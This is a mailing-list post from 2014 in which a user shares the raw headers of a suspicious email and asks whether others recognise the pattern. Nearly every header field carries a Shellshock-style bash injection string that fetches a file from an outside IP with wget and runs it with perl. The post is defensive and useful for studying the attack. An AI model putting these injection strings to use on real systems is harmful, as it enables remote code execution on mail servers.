First, I apologize for this not being fedora-specific, but I just got
the oddest email. It looks like an intrusion attempt, trying to get
sendmail to execute a perl script. Is anybody familiar with this
particular pattern?
The email is below.
Thanks,
billo
Return-Path: <MAILER-DAEMON(a)billoblog.com>
Received: from
incenclick.com (
incenclick.com [184.95.45.61] (may be
forged))
by
hope.billoblog.com (8.14.4/8.14.4) with SMTP id s96FKVOY029890
for <nobody>; Mon, 6 Oct 2014 15:20:31 GMT
Resent-Message-Id: <201410061520.s96FKVOY029890(a)hope.billoblog.com>
X-Authentication-Warning:
hope.billoblog.com:
incenclick.com
[184.95.45.61] (may be forged) didn't use HELO protocol
To:() { :;;};wget.http://91.207.254.60/.../bb.-O/tmp/bb;perl/tmp/bb@hope.billoblog.com;;
References:() { :; };wget
http://91.207.254.60/.../bb -O /tmp/bb; perl /tmp/bb
Cc:() { :;;};wget.http://91.207.254.60/.../bb.-O/tmp/bb;perl/tmp/bb@hope.billoblog.com;;
From:() { :;;};wget.http://91.207.254.60/.../bb.-O/tmp/bb;perl/tmp/bb@billoblog.com;;
Subject:() { :; };wget
http://91.207.254.60/.../bb -O /tmp/bb; perl /tmp/bb
Date:() { :; };wget
http://91.207.254.60/.../bb -O /tmp/bb; perl /tmp/bb
Message-ID:() { :; };wget
http://91.207.254.60/.../bb -O /tmp/bb; perl /tmp/bb
Comments:() { :; };wget
http://91.207.254.60/.../bb -O /tmp/bb; perl /tmp/bb
Keywords:() { :; };wget
http://91.207.254.60/.../bb -O /tmp/bb; perl /tmp/bb
Resent-Date:() { :; };wget
http://91.207.254.60/.../bb -O /tmp/bb; perl /tmp/bb
Resent-From:() {
:;;};wget.http://91.207.254.60/.../bb.-O/tmp/bb;perl/tmp/bb@billoblog.com;;
Resent-Sender:() {
:;;};wget.http://91.207.254.60/.../bb.-O/tmp/bb;perl/tmp/bb@billoblog.com;;
wget
http://91.207.254.60/.../bb -O /tmp/bb; perl /tmp/bb